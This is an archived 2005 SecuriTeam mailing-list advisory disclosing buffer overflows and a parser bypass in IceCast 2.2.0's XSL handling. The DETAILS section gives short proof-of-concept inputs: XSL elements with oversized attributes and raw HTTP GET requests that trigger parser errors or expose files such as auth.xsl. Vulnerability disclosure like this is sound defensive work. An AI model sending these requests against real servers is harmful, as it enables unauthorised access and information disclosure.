[UNIX] IceCast's Multiple Vulnerabilities (XMP parser)

From: SecuriTeam (support_at_securiteam.com)
Date: 03/22/05

  • Next message: SecuriTeam: "[NEWS] ZPanel SQL Injection, Arbitrary File Inclusion and Brute Forcing"
    To: list@securiteam.com
    Date: 22 Mar 2005 19:20:13 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      IceCast's Multiple Vulnerabilities (XMP parser)
    ------------------------------------------------------------------------

    SUMMARY

    " <http://www.icecast.org> Icecast is a streaming media server which
    currently supports Ogg Vorbis and MP3 audio streams. It can be used to
    create an Internet radio station or a privately running jukebox and many
    things in between."

    Multiple vulnerabilities found in IceCast XML parser. This could allow
    local privilage escelation

    DETAILS

    Vulnerable Systems:
     * IceCast version 2.20

    The XSL parser is vulnerable to multiple buffer overflow vulnerabilities.
    This can be exploited for local privilege escalation, under the user that
    the server runs.

    Proof of Concept Code:
    <xsl:when test="<lots of chars>"></xsl:when>
    <xsl:if test="<lots of chars>"></xsl:if>
    <xsl:value-of select="<lots of chars>" />

    Cause XSL parser error "Could not parse XSLT file":
    GET /status.xsl> HTTP/1.0
    GET /status.xsl< HTTP/1.0
    GET /<status.xsl HTTP/1.0

    XSL parser bypass and information disclosure:
    GET /auth.xsl. HTTP/1.0
    GET /status.xsl. HTTP/1.0

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:patrickthomassen@gmail.com>
    Patrick.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[NEWS] ZPanel SQL Injection, Arbitrary File Inclusion and Brute Forcing"

    Relevant Pages